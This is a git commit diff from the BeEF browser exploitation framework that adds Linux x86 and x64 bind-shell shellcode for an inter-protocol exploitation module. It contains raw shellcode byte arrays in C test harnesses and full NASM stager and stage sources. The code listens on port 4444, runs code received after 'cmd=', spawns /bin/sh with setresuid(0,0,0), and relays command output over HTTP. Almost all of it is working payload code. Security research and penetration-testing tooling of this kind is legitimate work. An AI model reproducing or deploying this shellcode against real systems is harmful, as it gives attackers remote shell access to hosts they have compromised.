add IPE with ActiveFax 5.01

2013-11-29 19:18:37 +01:00
parent 924717d6fa
commit d7116b8f08
31 changed files with 118 additions and 4 deletions
--- a/modules/exploits/beefbind/shellcode_sources/linux/x64/socket64.c
+++ b/modules/exploits/beefbind/shellcode_sources/linux/x64/socket64.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -fno-stack-protector -z execstack -o socket64 socket64.c
+**/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
+
+int main(int argc, char **argv) {
+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}
--- a/modules/exploits/beefbind/shellcode_sources/linux/x64/stage64.nasm
+++ b/modules/exploits/beefbind/shellcode_sources/linux/x64/stage64.nasm
@@ -0,0 +1,285 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx,rdx ;zero rdx
+
+	push BYTE 0x02
+	pop r14
+
+	;create two pipes
+createpipes:
+	push rdx ;allocate space on the stack
+	mov rdi, rsp ;point to the stack
+	push BYTE 0x16 
+	pop rax ;sys_pipe
+	syscall
+	dec r14
+	test r14, r14 ;create 2 pipes 
+	je endcreatepipes
+	jmp createpipes
+
+endcreatepipes:
+	;sys_fork
+	push BYTE 0x39
+	pop rax
+	syscall
+	cmp eax, 0x00 ;parent or child?
+	je child
+
+	xor rdi, rdi ; zero rdi
+	mov edi, DWORD [rsp+0x8] ; close read end of one pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;close write end of the other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	;make non-blocking
+	mov edi, DWORD [rsp] ;fd
+	push BYTE 0x04
+	pop rsi ;F_SETFL
+	xor rdx, rdx
+	mov rdx, 0x800 ;O_NONBLOCK
+	push BYTE 0x48
+	pop rax ; sys_fcntl
+	syscall	
+
+
+	;allocate one page of memory
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+doforever:
+	;initialize socket
+	xor rdx, rdx ;zero rdx (proto =0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx  ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1	
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	pop rax ;clean stack
+
+
+	;bind socket to port
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+	;listen 
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2b
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	;close serversocket
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+
+	mov rcx, 0x1000 ;pagesize
+firstzeromemory:
+	;zero out memory
+	dec rcx
+	mov rbx, r14
+	add rbx, rcx
+	mov BYTE [rbx], 0x00
+	jrcxz readfromsocket
+	jmp firstzeromemory 	
+
+readfromsocket:
+	xor rdx, rdx
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x400 ;read 1024 bytes
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	mov rcx, 0x400 ;search in 1024 bytes 
+	mov rbx, r14 ;ptr to allocated memory
+search:
+	cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd="
+	je found ;cmd= found
+	inc rbx
+	dec rcx
+	jrcxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+found:
+	xor rdi, rdi
+	mov rcx, rbx 
+	add rcx, 0x03 ;skip "cmd"
+	mov rsi, rcx
+	mov edi, DWORD [rsp+0xC] ;write to pipe
+sendcommand:
+	inc rsi ;first time skip "=", move to next byte
+	push BYTE 0x01
+	pop rdx ;write one byte
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+	cmp BYTE [rsi], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push BYTE 0x23
+	pop rax ;sys_nanosleep
+	push DWORD 0x00
+	push DWORD 0x01 ;one second
+	mov rdi, rsp ;ptr to argument array
+	xor rsi, rsi ;NULL
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+notfound:
+	call writehttpheaders
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a
+
+writehttpheaders:
+	pop rsi ;source address saved by call
+	mov rdi, r14 ;ptr to allocated memory
+	add rdi, 0x400 ;skip 1024 bytes
+	mov rcx, 0x62 ;copy 98 bytes
+	rep movsb
+
+	xor rdi, rdi ;zero rdi
+	mov edi, DWORD [rsp] ;read from pipe
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 bytes
+	add rsi, 0x62 ;skip header
+	mov rdx, 0xb86 ;read max 2950 bytes	
+	xor rax,rax ;sys_read
+	syscall
+
+
+	mov rdi, r15 ;clientsocket fd
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 first bytes
+	mov rdx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+
+	mov rdi, r15 ;close clientsocket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+	
+	jmp doforever
+child:
+	xor rdi, rdi 
+	mov edi, DWORD [rsp+0xc] ;close output side of pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi ;close stdin
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x08] ;dup input side to stdin
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+
+	mov edi, DWORD [rsp] ;close input side of other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi
+	inc rdi ;close stdout
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;dup output side to stdout
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+	;setresuid(0,0,0)
+	xor rdi, rdi
+	xor rsi, rsi
+	xor rdx, rdx
+	push BYTE 0x75
+	pop rax ;sys_resuid
+	syscall
+
+	push BYTE 0x3b
+	pop rax ;sys_execve
+	mov rdi, 0x0068732f6e69622f ;/bin/shNULL
+	push rdi ;push to stack
+	mov rdi, rsp ;ptr to stack
+	xor rsi, rsi ;NULL
+	xor rdx, rdx ;NULL
+	syscall
--- a/modules/exploits/beefbind/shellcode_sources/linux/x64/stager64.nasm
+++ b/modules/exploits/beefbind/shellcode_sources/linux/x64/stager64.nasm
@@ -0,0 +1,106 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx, rdx ;zero rdx (proto=0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2B
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+	;allocate memory
+	
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x1000 ;read one page of memory
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	;close clientsocketfd
+	mov rdi, r15 ;client socketfd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov rsi, r14 ;ptr to allocated memory
+search:
+	cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd="
+	je short found ;cmd= found
+	inc rsi
+	jmp short search ;search some more
+found:
+	push BYTE 0x04 ;skip "cmd="
+	pop rax
+	add rsi, rax
+	jmp rsi ;jump to stage
--- a/modules/exploits/beefbind/shellcode_sources/linux/x86/socket.c
+++ b/modules/exploits/beefbind/shellcode_sources/linux/x86/socket.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
+**/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
+
+int main(int argc, char **argv) {
+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}
--- a/modules/exploits/beefbind/shellcode_sources/linux/x86/stage.nasm
+++ b/modules/exploits/beefbind/shellcode_sources/linux/x86/stage.nasm
@@ -0,0 +1,290 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor edx, edx ;zero edx
+
+	push BYTE 0x02
+	pop ecx
+	;create two pipes
+createpipes:
+	push edx ;allocate space on stack
+	push edx
+	mov ebx, esp ; ptr to argument array
+	push BYTE 0x2A ;sys_pipe
+	pop eax
+	int 0x80 ;syscall 
+	dec ecx 
+	jcxz endcreatepipes ;jmp when both pipes are created
+	jmp short createpipes ;create next pipe
+
+endcreatepipes:	
+	;create fork	
+	xor ebx, ebx ;zero ebx
+	push BYTE 0x02 ;sys_fork
+	pop eax
+	int 0x80 ;syscall
+	cmp eax, 0x00 ;parent or child
+	je child
+
+	mov ebx, [esp+0x8] ;close read end of one pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;close write end of the other pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	; make non blocking
+	mov ebx, [esp] ;fd
+	push BYTE 0x04 ;F_SETFL
+	pop ecx
+	push 0x800 ;O_NONBLOCK
+	pop edx
+	push BYTE 0x37 ;sys_fcntl
+	pop eax
+	int 0x80
+ 
+	;allocate one page of memory
+	push BYTE 0x00 ;offset = 0
+	push 0xffffffff ;fd=-1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push 0x00 ;system determines location
+	mov ebx, esp ;ptr to argument array
+	push BYTE 0x5a
+	pop eax
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+	add esp, 0x18
+	
+doforever:
+	xor edx, edx
+	xor eax, eax
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;proto = 0
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax
+	push eax ;AF_INET = 2
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	mov esi, eax ; save socket filedescriptor
+	add esp, 0x0C
+
+	;reuse socket
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04 ;sizeof socklen_t
+	push esp ;address of socklen_t
+	push BYTE 0x02 ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	add esp, 0x14
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115c = 4444
+	mov ecx, esp ;ptr to server struct
+	push BYTE 0x10 ; addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x14
+
+	inc ebx
+	inc ebx  ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+	add esp, 0x08
+	
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;sockfd
+	mov ecx, esp ;ptr to argumet array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x0c
+	
+	xchg esi, eax ;serversocket in eax and clientsocket handler in esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x06 ;close serversocket
+	int 0x80
+
+	mov ecx, 0x1000
+firstzeromemory:
+	;zero out memory
+	dec ecx
+	mov ebx, edi
+	add ebx, ecx
+	mov BYTE [ebx], 0x00
+	jecxz readfromsocket
+	jmp firstzeromemory
+
+readfromsocket:
+	;read from socket into memory
+	mov dx, 0x400 ;read 1024 bytes
+	mov ecx, edi ;ptr to allocated memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax ;sys_read
+	int 0x80
+
+	push edi ;ptr to allocate memory
+	push esi ;clientsocket
+	mov ebx, edi ;ptr to allocated memory
+	mov ecx, 0x400 ;search in 1024 bytes
+search:
+	cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd="
+	je found ;cmd= found
+	inc ebx
+	dec ecx
+	jecxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+
+found:
+	mov ecx, ebx ;put ptr to memory where "cmd=" was found
+	add ecx, 0x03 ;skip "cmd"
+	mov ebx, [esp+0x14] ;write to pipe
+sendcommand:
+	inc ecx ;first time skip "=", move to next byte
+	push BYTE 0x01 ;write one byte
+	pop edx
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+	cmp BYTE [ecx], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push 0x00
+	push 0x01 ;one second
+	mov ebx, esp ;ptr to argument array
+	xor ecx, ecx ;NULL
+	mov eax, 0xA2 ;sys_nanosleep
+	int 0x80
+	add esp, 0x08 ;clean up stack	
+
+notfound:
+	call writehttpheaders	
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a  ;HTTP/1.1 200 OK
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a  ;Content-Type: text/html
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a  ;Access-Control-Allow-Origin: *
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a  ;Content-Length: 3048
+
+writehttpheaders:
+	pop esi ;source address saved by call
+	add edi, 0x400 ;ptr to memory skip 1024 bytes
+	mov ecx, 0x62 ;copy 98 bytes
+	rep movsb
+	
+	pop edi ;restore clientsocket 	
+	pop esi ;restore ptr to memory
+	
+		
+	mov ebx, [esp] ;read from pipe
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 bytes
+	add ecx, 0x62 ;skip header
+	push 0xB86 ;read max 2950 bytes
+	pop edx
+	push BYTE 0x03 ;sys_read
+	pop eax
+	int 0x80
+
+	mov ebx, edi ;clientsocket
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 first bytes
+	mov edx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+
+	;close clientsocket	
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov edi, esi ;restore memory ptr into edi
+	jmp doforever
+
+child:
+	mov ebx, [esp+0xC] ;close output side of pipe 
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+	
+	xor ebx, ebx ;close stdin
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x8] ;dup input side to stdin
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+	
+	mov ebx, [esp] ;close input side of other pipe
+	push BYTE 0x06
+	pop eax
+	int 0x80
+
+	xor ebx, ebx
+	inc ebx ;close stdout
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;dup output side to stdout
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+
+	;setresuid(0,0,0)
+	xor eax, eax
+	xor ebx, ebx
+	xor ecx, ecx
+	xor edx, edx
+	mov al, 0xa4 ;sys_setresuid16
+	int 0x80
+
+	;execve("/bin//sh", 0, 0)	
+	xor eax, eax
+	push eax
+	push eax
+	push 0x68732f2f ;//sh
+	push 0x6e69622f ;/bin
+	mov ebx, esp
+	push BYTE 0x0b ;sys_execve
+	pop eax
+	int 0x80
--- a/modules/exploits/beefbind/shellcode_sources/linux/x86/stager.nasm
+++ b/modules/exploits/beefbind/shellcode_sources/linux/x86/stager.nasm
@@ -0,0 +1,111 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor eax, eax ;zero eax
+	xor edx, edx ;zero edx
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;  proto = 0 
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax 
+	push eax ;AF_INET = 2
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	mov esi, eax ;save socket filediscriptor
+
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04  ;sizeof socklen_t
+	push esp ; address of socklen_t
+	push BYTE 0x02  ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115C = 4444
+	mov ecx, esp ;server struct
+	push BYTE 0x10 ;addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx
+	inc ebx ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	xchg esi, eax ;serversocket in eax and client socket handler into esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x6 ;close serversocket
+	int 0x80
+
+	push BYTE 0x00 ;offset =0
+	push 0xFFFFFFFF ;fd = -1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push BYTE 0x00 ;system determines location
+	mov ebx, esp ;ptr tot argument array
+	push BYTE 0x5a
+	pop eax ;MMAP call
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+
+	; read from socket into memory
+	mov dx, 0x1000 ;max bytes to read
+	mov ecx, edi ;pointer to memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax
+	int 0x80	
+
+	push BYTE 0x06
+	pop eax ;close clientsocket
+	int 0x80
+
+search:
+	cmp DWORD [edi], 0x3d646d63 ;compare with "cmd="
+	je short found ;jump if found
+	inc edi ;look some further
+	jmp short search
+found:
+	push BYTE 0x04 
+	pop eax
+	add edi, eax ;skip "cmd="
+	jmp edi ;jump to the staged shellcode